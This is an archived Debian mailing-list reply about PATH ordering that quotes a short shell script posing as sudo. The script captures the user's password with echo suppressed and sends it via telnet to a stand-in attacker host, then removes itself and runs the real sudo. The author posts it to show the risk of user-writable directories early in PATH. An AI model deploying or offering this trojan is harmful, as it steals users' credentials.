Re: /usr/bin before /usr/local/bin? (reality check)

To: debian-user@lists.debian.org
Cc: Hubert Chan <hackerhue@crosswinds.net>, debian-user@lists.debian.org
Subject: Re: /usr/bin before /usr/local/bin? (reality check)
From: Ethan Benson <erbenson@alaska.net>
Date: Wed, 1 Nov 2000 21:16:20 -0900
Message-id: <[🔎] 20001101211620.A709@plato.local.lan>
In-reply-to: <[🔎] 20001101185841.K3768@plato.local.lan>; from erbenson@alaska.net on Wed, Nov 01, 2000 at 06:58:41PM -0900
References: <Pine.LNX.4.21.0010312034020.11571-100000@benatar.snurgle.org> <[🔎] 87y9z3le9p.fsf@sixpack.math.ualberta.ca> <[🔎] 20001101185841.K3768@plato.local.lan>

just to nit a pick before someone else does in my little trojan...

On Wed, Nov 01, 2000 at 06:58:41PM -0900, Ethan Benson wrote:
> 
> do you always type /usr/bin/sudo instead of just sudo?
> 
> #! /bin/sh
> ## this is a fake sudo

stty -echo
> printf 1>&2 "Password: "
stty echo
> read password
> echo "$password" | telnet evil.cracker.net 1337 > /dev/null 2>&1
> echo 1>&2 "Sorry, try again."
> rm -f ~/bin/sudo
> exec /usr/bin/sudo "$@"
> 

otherwise you would see your password echoed to the terminal which
would kind of give away the subterfuge...


-- 
Ethan Benson
http://www.alaska.net/~erbenson/

Attachment: pgp4TLI1W42sg.pgp
Description: PGP signature

Reply to:

References:
- Re: /usr/bin before /usr/local/bin?
  - From: Hubert Chan <hackerhue@crosswinds.net>
- Re: /usr/bin before /usr/local/bin? (reality check)
  - From: Ethan Benson <erbenson@alaska.net>

Prev by Date: ip-up: slrnpull does not work.
Next by Date: tkdvi
Previous by thread: Re: /usr/bin before /usr/local/bin? (reality check)
Next by thread: Re: /usr/bin before /usr/local/bin?
Index(es):
- Date
- Thread